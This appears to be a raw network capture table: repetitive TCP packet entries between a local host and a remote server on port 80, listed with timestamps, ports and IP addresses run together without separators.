                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.599304914 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.599343061 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.599370956 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.599407911 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.599457979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.599576950 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.599618912 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.599672079 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.599756956 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.599796057 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.599843025 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.600033045 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.600070953 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.600100040 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.600233078 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.600281000 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.600313902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.600445986 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.600471020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.600486040 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.600534916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.600573063 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.600604057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.600704908 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.600744963 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.600754023 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601000071 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601051092 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601074934 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601111889 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601151943 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601206064 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601336002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601349115 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601377010 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601425886 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601464987 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601614952 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601629019 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601667881 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601718903 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601763964 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601804972 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601856947 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601950884 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.601986885 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.602044106 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.602222919 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.602261066 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.602359056 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.602435112 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.602475882 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.602524996 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.602591991 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.602629900 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.602678061 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.602765083 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.602802992 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.602849960 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.602937937 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.602982998 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.603013039 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.603364944 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.603413105 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.603437901 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.603506088 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.603544950 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.603591919 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.603661060 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.603699923 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.603748083 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.603857994 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.603874922 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.603900909 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.603950977 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.603991985 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.604053020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.604093075 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.604130983 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.604176998 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.604258060 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.604301929 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.604343891 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.604460955 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.604504108 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.604559898 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.604840040 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.604883909 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.604934931 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605021000 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605061054 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605117083 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605169058 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605210066 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605242014 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605330944 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605401039 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605411053 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605559111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605581045 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605608940 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605662107 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605699062 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605730057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605843067 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605916977 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605930090 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.605966091 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.606005907 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.606045961 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.606168032 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.606209040 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.606259108 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.606621981 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.606667995 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.606692076 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.606771946 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.606812954 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.606853008 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.606960058 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.607001066 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.607062101 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.607229948 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.607270002 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.607300997 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.607342958 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.607383013 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.607803106 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.607896090 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.607940912 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.607964039 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.608033895 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.608073950 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.608117104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.608283043 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.608326912 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.608359098 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.608434916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.608474970 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.608522892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.608602047 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.608642101 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.608650923 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.608812094 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.608855009 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.608887911 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.609006882 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.609045982 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.609047890 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.609201908 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.609246016 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.609270096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.609380007 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.609424114 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.609448910 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.609527111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.609566927 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.610022068 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.610091925 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.610133886 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.610189915 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.610383987 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.610419035 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.610450029 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.610512972 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.610549927 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.610591888 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.610737085 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.610774994 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.610838890 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.610887051 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.610929012 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.610980988 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611042976 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611084938 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611128092 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611232042 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611269951 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611323118 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611476898 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611490011 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611516953 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611582994 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611625910 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611654043 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611740112 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611778975 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611829042 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611907959 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611951113 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.611994028 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.612067938 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.612107038 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.612149000 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.612262964 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.612303019 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.612349987 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.612447977 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.612488031 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.612540007 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.612615108 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.612649918 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.612709999 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.612890005 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.612927914 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.612981081 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.613049984 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.613087893 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.613142967 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.613228083 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.613266945 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.613306999 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.613398075 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.613437891 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.613467932 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.613575935 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.613615990 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.613755941 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.613770008 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.613806963 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.613818884 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.614337921 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.614391088 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.614435911 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.614500999 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.614540100 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.614593983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.614701033 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.614737988 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.614790916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.614876986 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.614918947 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.614942074 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615000010 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615037918 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615077972 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615223885 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615257025 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615291119 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615335941 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615372896 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615401983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615488052 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615528107 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615569115 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615642071 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615679979 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615684032 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615789890 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615828991 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615876913 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615952015 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.615989923 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.616035938 CET804973891.215.85.17192.168.2.4
